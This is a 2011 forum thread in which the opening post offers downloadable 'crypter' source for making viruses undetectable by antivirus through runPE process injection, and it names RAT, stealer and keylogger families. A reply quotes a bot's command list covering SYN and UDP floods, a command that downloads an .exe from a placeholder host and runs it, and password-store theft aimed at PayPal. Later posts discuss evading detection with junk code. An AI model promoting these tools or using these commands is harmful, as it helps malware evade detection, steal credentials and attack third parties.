Posted January 5, 201114 yr hello i am here today with the executable that can obfuscate the virus and makes it fully undetectable from anti-viruses.This executable uses runPE techniques to inject into other process and to dump the crypted code into memory and hence the executable's code remain undetected by Anti-viruses. These crypters are programmed by individuals and hence remains undetected most of the time .Mostly they are coded in VB or .Net and hence you will find most of the viruses showing vb attributes during PE Scans ,but mostly the viruses/RATs/Stealers/Bots/Worms are coded in borland Delphi.Examples :1) RATS : cybergate,Blackshades,pixel,spynet,darkcomet etc2) STEALERS : Istealer v6.0(latest),Albertino,maya password stealer etc3) KEYLOGGERS : Albertino , Rapzo ,Irtech etc4) Crypters : icrypt , galaxy ,balckout AIO,demon ,cypherx(www.crypters.net) etc.The sample crypter source code is attached here .CodingNation_Crypter_Source.rar
March 30, 201114 yr http://www.virustotal.com/file-scan/report.html?id=7d389377a5bf54147bc675df8a1ca0742991224b3c21e1ad7aa131e6b81575fc-1301452801http://www.virustotal.com/file-scan/report.html?id=a77380725c96204df0bbad34a715358b1e193989f3e9053cefe80a73ad19816c-1301452813i think the below code must not be present in a crypter project this makes it behave like a bothello [login].bai [logout].removeAll [removes ALL bots]DDoS CMDs./syn (google.com 80 1000)./udp (google.com 80 1000) Careful might destroy botsDownload/Update./download (http://site.com/file.exe C:\file.exe 1)./update (????)MSC./msnmsg (hey is this you? www.yoursite.com)./visit (http://site.com/)./pstore (all pswds)./pstoreS (./pstoreS paypal: searches paypal)
June 1, 201114 yr @Cipher : Thanks Mate, but old guddys i played with them when I was learning CEH. This guddys are no more, for example in our team ICA, we dont use like this.Try the self mod version of Fly Crypter.And also nice name collection of RAT's.@ksanket : These codes are not used to make behave like a bot, this codes are part of Trojan or stealer's.
July 22, 201114 yr Author @Blue indian : i guess you are talking about polymorphic engine , but still 99% of the crypters in market uses the same PE injection technique.i Dunno much about the polymorphic engine tho still they manage to make it FUD by adding junk code , by changing the variable names and by some advanced techniques.
Create an account or sign in to comment